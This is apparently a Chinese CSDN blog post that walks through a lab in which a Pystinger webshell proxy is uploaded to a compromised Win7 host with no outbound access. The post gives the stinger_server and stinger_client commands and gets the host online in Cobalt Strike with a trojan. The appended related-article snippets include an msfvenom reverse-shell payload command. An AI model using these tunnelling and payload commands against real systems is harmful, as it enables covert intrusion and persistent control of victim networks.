Pystinger上线不出网机器

最新推荐文章于 2024-02-14 01:31:39 发布
最新推荐文章于 2024-02-14 01:31:39 发布
阅读量2.1k 收藏 5
点赞数 1
分类专栏: 后渗透、内网学习 文章标签: Pystinger
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/109297880
版权

有时候实战拿shell后发现,目标机器ping不通外网,没有办法走网络层协议,所以需要搭建不出网隧道,但经过实验,建议最好是php环境会比较稳定。同样操作jsp环境下问题居多
相关介绍

Kali作vps 192.168.201.129 目标win7:192.168.201.132

目前拿下win7 shell
在这里插入图片描述

上传对应的Pystinger webshell文件并成功访问
在这里插入图片描述

然后将 stinger_server.exe上传到目标服务器 ,执行如下命令:

start stinger_server.exe 0.0.0.0

在这里插入图片描述

然后将stinger_client上传到vps,执行如下命令

./stinger_client -w http://192.168.201.132/proxy.jsp -l 0.0.0.0 -p 60000

发现失败,总是走不成功。没想明白为什么,因为环境用的是jspstudy,也支持php文件,在phproot目录下,所以我后面传了php文件上去后,发现成功了,实验后续如下。
在这里插入图片描述
上传php文件后并访问。 (猜测:如果php走通这个隧道,需要一下几个函数没被禁用才行)
在这里插入图片描述

执行php文件的操作

./stinger_client -w http://192.168.201.132/phproot/proxy.php -l 0.0.0.0 -p 60000

在这里插入图片描述

cs设置本地的监听地址和60020端口(注意是127.0.0.1)
在这里插入图片描述

然后cs选择test的listen发送exe或者powershell木马上线都可以,成功上线,vps(kali)可以看到有数据交互
在这里插入图片描述

在这里插入图片描述

努力的学渣'#
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
隧道代理技术(二十)之 CS使用HTTP代理上线不出机器
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-02 841
如图A区域存在一台中转机器,这台机器可以出,这种是最常见的情况。我们在渗透测试的过程中经常是拿下一台边缘机器,其有多块卡,边缘机器可以访问内机器,内机器不出
一款使用webshell进行流量转发的出工具(pystinger)
lza20001103的博客
08-26 329
一款使用webshell进行流量转发的出工具(pystinger) 下载地址:https://github.com/FunnyWolf/pystinger
Pystinger实现内主机CS上线
痴人说梦梦中人
03-29 4694
Pystinger实现内主机CS上线一、Pystinger简介二、原理分析三、操作演示 一、Pystinger简介         毒刺(pystinger)通过webshell实现内SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。 repo:https://github.c
pystinger实现不出情况下,上线CS的方式
szgyunyun的博客
04-25 396
获取到webshell,目标服务器不出。目标机:内地址,端口映射到公ip。s生成后门在目标机运行。
渗透工具pystinger:一款使用 webshell 进行流量转发的出工具
学习、分享、交流
05-09 1895
通过webshell实现内SOCK4代理,端口映射. 可直接用于metasploit-framework,viper,cobalt strike上线. 主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
Metasploit和Cobaltstrike上线不出机器
qq_40863723的博客
02-14 3996
多喝热水:http://hackergu.com 内中的很多机器是不可以出的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=7777 -f elf >test.elf 在目标机器上使...
【工具使用】Pystinger(毒刺)的使用
做自己喜欢的事,并将其发挥到极致!
03-09 1396
文章目录Pystinger介绍项目地址Pystinger 原理图实现主机上线CS服务端配置客户端配置 Pystinger介绍 一款用于Webshell实现内 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。 项目地址 https://github.com/FunnyWolf/pystinger https://gitee.com/zhanghk66
渗透中目标不出的情况下使用pystinger进行上线Cobalt Strike
qq_43776040的博客
02-17 3213
渗透中目标不出的情况下使用pystinger进行上线cobaltstrike简介上传服务端与代理文件 简介 By:猪儿虫 Github:https://github.com/black537 在内渗透中我们常常遇到内不出的情况。今天推荐一款工具pystinger。这款工具是一个使用webshell进行流量转发出的工具。它使用的是sock4代理,端口映射。可直接进行上线metasploit-framework、viper、cobalt strike。目前只支持PHP、jsp(x)、aspx三种
pystinger (毒刺)正向代理工具
weixin_66717977的博客
03-21 1635
pystinger毒刺是一款正向代理工具,通过webshell可以实现内 socks4代理和端口映射,并且也可以直接上线MSF和CS。
Pystinger的使用
谢公子的博客
08-30 2656
目录 Pystinger 实现多主机上线cs 目标主机执行 VPS执行 CS开启监听 生成木马 内横向移动 Pystinger 一款利用webshell实现内socks4代理、端口映射的工具,可直接用于MSF/CS等上线。使用python编写, 当前支持php,jsp(x),aspx三种代理脚本 。 项目地址: https://github.com/FunnyWolf/pystinger 原地介绍: https://mp.weixin.qq.com/s/45AKbRS677fxyn
HTTP隐蔽隧道工具--pystinger流量特征检测分析
qq_36259703的博客
10-20 187
毒刺(pystinger)通过webshell实现可直接用于metasploit-framework,viper,cobalt strike上线.主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
【内渗透】利用非常规手段突破安全策略上线CS
HBohan的博客
10-28 1181
前言 本文为一篇利用非常规手段突破安全策略的内渗透记录 【查看资料】 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 2016,目标不出! 装有杀毒软件(火绒、微软自带的WD),ASMI默认开启,而且对power shell有特殊策略限制。 Tcp、icmp、DNS协议不通,无法直接与公的cs服务端建立连接,(内的cs服务端也无法与其建立连接)公也无法访问目标web服务(纯内web服务) 极其严格的出入站策略 入
渗透--对不出目标的打法
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1541
配置络 在VM虚拟机中按照下边的络拓扑进行配置络。络拓扑图如下: win7具有双卡,其中外ip是192.168.8.133,内段是52。三台机器彼此互通,但是win server 2008和win2003不通外。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 外打点 在win7这台靶机上,使用PHPStudy让站可以运行起来。在攻击机上,访问http://192.168.8.133可以看到是一个phpStudy 探针。对这站进行渗透,因为本文主要写在内渗透过程..
Webshell不出方案之正向socks代理reGeorg+Proxifier使用
Websec
09-14 8469
1、首先你已经拥有了一个webshell,如下我拥有一个天蝎shell: 2、机器不出(无法ping百度)。 2、这个时候需要使用reGeorg将我们的流量正向代理出来。 reGeorg地址如下: https://github.com/sensepost/reGeorg 下载到本地。 具体详细操作使用为: 第一步:上传tunnel.(aspx/php/jsp/ashx)到你控制的服务器上(如何拥有一台已控取决于自己)。 第二步:上传成功后核对你的tunnel脚本成功使用,一般正
ShowDoc突破边界上线Linux不出主机
afei001
08-10 386
通过前期的信息收集发现目标子目录使用了ShowDoc组件。ShowDoc一个开源的、适合IT团队的在线API文档、技术文档工具。Showdoc是存在不少漏洞的,通过探测发现后台存在文件上传漏洞。二话不说,掏出POC,上传冰蝎免杀webshell上线。...
渗透-(端口复用和隧道建立)
qq_50643984的博客
03-15 3399
前言: 首先对于出不出的区别很多人不理解,内不出到底是ping不通百度还是ping不通同一段的机器。 其实大部分内不出都是ping不通百度,不能去外,ping不通同一段要不是配置错误,要不就是防火墙问题,还有就是不能ping通同一段的机器上线价值不大,以下我们讨论的不出都是不能ping通百度的。 对于有双卡的机器,既可以出外又和内机器相同我们称这个机器为(DMZ区机器),也就是win7机器,一般也是我们的跳板机。 对于这种我们可以直接拿下dmz区域的机器,利用dmz机器跳板进
给内络访问的测试主机部署项目
这里没有简介
07-27 83
需要做的事情就是我们自己打包jar,上传文件到服务器上,并启动该jar。案例背景,一个测试服务器,在内,没有络,实现过程比较繁琐费事,所以就出现了如下脚本。
红队笔记Day3-->隧道上线不出机器
最新发布
huohaowen的博客
02-14 1074
今天来讲一下个各种隧道
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值